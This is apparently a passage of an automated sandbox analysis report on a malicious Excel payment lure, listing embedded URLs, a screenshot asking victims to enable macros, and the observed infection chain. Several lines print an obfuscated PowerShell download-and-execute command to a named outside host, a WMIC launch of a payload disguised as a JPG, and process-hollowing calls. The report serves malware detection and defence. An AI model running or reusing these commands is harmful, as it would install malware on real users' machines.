      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://onedrive.live.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://outlook.office.com/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://outlook.office365.com/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://settings.outlook.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://staging.cortana.ai
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://store.office.com/addinstemplate
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://tasks.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://templatelogging.office.com/client/log
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://wus2-000.contentsync.
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://www.odwebp.svc.ms
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgWindows user hook set: 0 mouse low level NULLJump to behavior

      System Summary:

      barindex
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: Enable Content 5 Al - " ;& r 6 I A I B C D E F I G I H I I I J C 7 8 1 9 2 10 3 11 4
      Source: Screenshot number: 8Screenshot OCR: Enable Editing" form the yellow bar and then click 5 8 "Enable Content" ,6 g 7 10 ,8 11 ,9 12
      Source: Screenshot number: 8Screenshot OCR: Enable Content X ' . Al " (" jR " 5 7 A B I C I D I, E I F G H I J K 'T , 1 I y 3 2 : Qil D?'
      Contains functionality to create processes via WMIShow sources
      Source: WMIC.exe, 0000001A.00000002.345078681.00000000035D0000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\WMIC.exeWmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpgWmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpgWinSta0\Default
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: Scanned_25526662-Payment.xlsInitial sample: EXEC
      Powershell drops PE fileShow sources
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Test1.txtJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_00424D1A NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,27_2_00424D1A
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_022100C7 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,27_2_022100C7
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221002C NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,27_2_0221002C
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221000B NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,27_2_0221000B
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210072 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,27_2_02210072
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_00478772 __EH_prolog,GetModuleHandleA,GetProcAddress,GetCurrentThread,NtSetInformationThread,29_2_00478772
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_005C6B10: new,DeviceIoControl,29_2_005C6B10
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_006940D029_2_006940D0
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_006849A029_2_006849A0
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_0040EA7D29_2_0040EA7D
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_004F2AA729_2_004F2AA7
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_0042ABC129_2_0042ABC1
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_0068321E29_2_0068321E
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_0041153229_2_00411532
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_004276C429_2_004276C4
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_00689D6729_2_00689D67
      Source: Scanned_25526662-Payment.xlsOLE indicator, VBA macros: true
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: String function: 006876A0 appears 81 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: String function: 006811C5 appears 69 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: String function: 006B08FC appears 794 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: String function: 00411C35 appears 39 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: String function: 00680E81 appears 125 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: String function: 006850AE appears 33 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: String function: 005CEF10 appears 131 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: String function: 00411FB1 appears 168 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: String function: 00696B06 appears 44 times
      Source: nwaha3c5.dll.21.drStatic PE information: No import functions for PE file found
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: Scanned_25526662-Payment.xls, type: SAMPLEMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
      Source: C:\Users\user\Desktop\1BA10000, type: DROPPEDMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
      Source: Test3.jpg.23.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@19/22@1/2
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_0045624F __EH_prolog,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,29_2_0045624F
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_004231B3 __CxxThrowException@8,GetLastError,LoadResource,LockResource,SizeofResource,29_2_004231B3
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_01
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgMutant created: \Sessions\1\BaseNamedObjects\693cae42864dd7a2e04c35636e49f749
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{BF342920-9C68-4407-BD39-EA487E52A3EE} - OProcSessId.datJump to behavior
      Source: Scanned_25526662-Payment.xlsOLE indicator, Workbook stream: true
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Scanned_25526662-Payment.xlsVirustotal: Detection: 14%
      Source: Scanned_25526662-Payment.xlsReversingLabs: Detection: 15%
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESBD2F.tmp' 'c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP'
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C COPy /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C WmIC PRocESs CAlL cREAtE %TEMP%\Test3.jpg
      Source: unknownProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpg
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C COPy /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpgJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C WmIC PRocESs CAlL cREAtE %TEMP%\Test3.jpgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESBD2F.tmp' 'c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP'Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpgJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

      Data Obfuscation:

      barindex
      PowerShell case anomaly foundShow sources
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))Jump to behavior
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_007D5210 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,29_2_007D5210
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_00402F43 pushfd ; iretd 27_2_00402F49
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_00682156 push ecx; ret 29_2_00682169
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_006B08FC push eax; ret 29_2_006B091A
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_006B099C push ecx; ret 29_2_006B09AC
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_00400F04 push eax; ret 29_2_00400F3F
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_0068118E push ecx; ret 29_2_006811A1
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_0042BBAE push eax; ret 29_2_0042BBAF
      Source: initial sampleStatic PE information: section name: .text entropy: 7.92605680707

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Test1.txtJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.dllJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Test3.jpgJump to dropped file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Test1.txtJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Test3.jpgJump to dropped file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
